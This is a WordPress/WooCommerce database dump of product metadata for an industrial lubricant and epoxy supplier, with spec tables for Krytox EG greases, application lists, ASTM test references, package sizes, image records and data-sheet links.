INSERT INTO `wp_postmeta` VALUES (10007, 967, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224"><strong>EG 2000</strong></td>\r\n<td style="text-align: center;" width="241"><strong>EG 3000</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Estimated Temperature Range</strong></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">-34-288</td>\r\n<td style="text-align: center;">-29-316</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">-30-550</td>\r\n<td style="text-align: center;">-20-550</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Base Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>38°C</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">500</td>\r\n</tr>\r\n<tr>\r\n<td>99°C</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">43</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease Density g/ml</strong></td>\r\n<td style="text-align: center;">1.93</td>\r\n<td style="text-align: center;">1.93</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10008, 967, '716_default_editor', '<ul>\r\n 	<li>Electronics</li>\r\n 	<li>Circuit Boards</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Chains</li>\r\n 	<li>Rollers</li>\r\n 	<li>O-Rings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10009, 967, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D972</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>FTMS 791B 321.1</li>\r\n 	<li>FTMS 791B 350.1</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10010, 967, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125">&nbsp;</td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125">&nbsp;</td>\r\n<td style="text-align: center;" width="125">&nbsp;</td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10011, 967, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10012, 967, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10013, 967, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10014, 967, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10015, 967, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10016, 967, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10017, 967, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10018, 967, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10019, 967, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10020, 967, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10021, 967, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10022, 967, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10023, 967, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10024, 967, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10025, 967, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10026, 967, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10027, 967, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10028, 967, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10029, 967, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10030, 967, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10031, 967, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10032, 967, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10033, 967, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10034, 967, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10035, 967, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10036, 967, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10037, 967, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10038, 967, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10039, 967, '_product_image_gallery', '380,375,377,381'); 
INSERT INTO `wp_postmeta` VALUES (10040, 968, '_edit_lock', '1475066145:2'); 
INSERT INTO `wp_postmeta` VALUES (10041, 968, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10043, 968, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10044, 968, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10045, 968, '312_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td width="202"></td>\r\n<td style="text-align: center;" width="224"><strong>EG 2000</strong></td>\r\n<td style="text-align: center;" width="241"><strong>EG 3000</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Estimated Temperature Range</strong></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">-34-288</td>\r\n<td style="text-align: center;">-29-316</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">-30-550</td>\r\n<td style="text-align: center;">-20-550</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Base Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">800</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>38°C</td>\r\n<td style="text-align: center;">270</td>\r\n<td style="text-align: center;">500</td>\r\n</tr>\r\n<tr>\r\n<td>99°C</td>\r\n<td style="text-align: center;">26</td>\r\n<td style="text-align: center;">43</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease Density g/ml</strong></td>\r\n<td style="text-align: center;">1.93</td>\r\n<td style="text-align: center;">1.93</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10046, 968, '716_default_editor', '<ul>\r\n 	<li>Electronics</li>\r\n 	<li>Circuit Boards</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Chains</li>\r\n 	<li>Rollers</li>\r\n 	<li>O-Rings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10047, 968, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D972</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>FTMS 791B 321.1</li>\r\n 	<li>FTMS 791B 350.1</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10048, 968, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10049, 968, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10050, 968, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10051, 968, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10052, 968, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10053, 968, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10054, 968, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10055, 968, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10056, 968, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10057, 968, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10058, 968, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10059, 968, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10060, 968, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10061, 968, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10062, 968, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10063, 968, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10064, 968, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10065, 968, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10066, 968, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10067, 968, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10068, 968, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10069, 968, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10070, 968, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10071, 968, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10072, 968, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10073, 968, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10074, 968, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10075, 968, '_product_image_gallery', '380,375,377,381'); 
INSERT INTO `wp_postmeta` VALUES (10103, 969, '_wp_attached_file', '2016/08/krytox-eg-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10104, 969, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2848;s:6:"height";i:2848;s:4:"file";s:28:"2016/08/krytox-eg-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"krytox-eg-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"krytox-eg-grease-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"krytox-eg-grease-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"krytox-eg-grease-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"krytox-eg-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"krytox-eg-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"krytox-eg-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"krytox-eg-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10105, 968, '_thumbnail_id', '969'); 
INSERT INTO `wp_postmeta` VALUES (10106, 968, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10107, 968, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10108, 968, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (10109, 970, '_edit_lock', '1474469781:2'); 
INSERT INTO `wp_postmeta` VALUES (10110, 970, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10111, 971, '_wp_attached_file', '2016/08/8021.pdf'); 
INSERT INTO `wp_postmeta` VALUES (10112, 970, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10113, 970, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10114, 970, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10115, 970, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10116, 970, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10117, 970, '318_custom_list_file', 'a:2:{s:32:"54456c0f3da7e8dd026af37cc5143cd8";a:3:{s:4:"name";s:9:"EPON 8021";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/8021.pdf";s:4:"desc";s:13:"EPON 8021 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (10118, 970, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (10119, 970, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10120, 970, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10121, 970, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10122, 970, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10123, 970, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10124, 970, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10125, 970, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10126, 970, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10127, 970, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10128, 970, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10129, 970, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10130, 970, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10131, 970, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10132, 970, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10133, 970, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10134, 970, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10135, 970, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10136, 970, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10137, 970, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10138, 970, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10139, 970, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10140, 970, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10141, 970, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10142, 970, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10143, 970, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10144, 970, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10145, 970, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10146, 970, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10147, 970, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (10148, 973, '_edit_lock', '1503344884:2'); 
INSERT INTO `wp_postmeta` VALUES (10149, 973, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10150, 974, '_wp_attached_file', '2016/08/krytox-fpg-028.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10151, 974, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:26:"2016/08/krytox-fpg-028.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"krytox-fpg-028-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"krytox-fpg-028-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"krytox-fpg-028-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"krytox-fpg-028-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"krytox-fpg-028-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"krytox-fpg-028-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"krytox-fpg-028-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:26:"krytox-fpg-028-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10152, 975, '_wp_attached_file', '2016/08/krytox-fpg-128.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10153, 975, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2222;s:6:"height";i:1666;s:4:"file";s:26:"2016/08/krytox-fpg-128.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"krytox-fpg-128-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"krytox-fpg-128-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"krytox-fpg-128-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"krytox-fpg-128-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"krytox-fpg-128-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"krytox-fpg-128-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"krytox-fpg-128-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:26:"krytox-fpg-128-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10154, 973, '_thumbnail_id', '4872'); 
INSERT INTO `wp_postmeta` VALUES (10155, 976, '_wp_attached_file', '2016/08/Elastomer-EPOXY.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10156, 976, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3888;s:6:"height";i:2592;s:4:"file";s:27:"2016/08/Elastomer-EPOXY.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"Elastomer-EPOXY-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10157, 977, '_edit_lock', '1474470006:2'); 
INSERT INTO `wp_postmeta` VALUES (10158, 977, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10159, 978, '_wp_attached_file', '2016/08/58005.pdf'); 
INSERT INTO `wp_postmeta` VALUES (10160, 977, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10161, 977, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10162, 977, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10163, 977, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10164, 977, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10165, 977, '318_custom_list_file', 'a:2:{s:32:"c59158a31e173cae993b18cefbc7ce76";a:3:{s:4:"name";s:10:"EPON 58005";s:4:"file";s:70:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/58005.pdf";s:4:"desc";s:14:"EPON 58005 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (10166, 977, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (10167, 977, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10168, 977, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10169, 977, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10170, 977, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10171, 977, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10172, 977, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10173, 977, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10174, 977, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10175, 977, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10176, 977, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10177, 977, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10178, 977, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10179, 977, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10180, 977, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10181, 977, '_sale_price_dates_from', ''); 
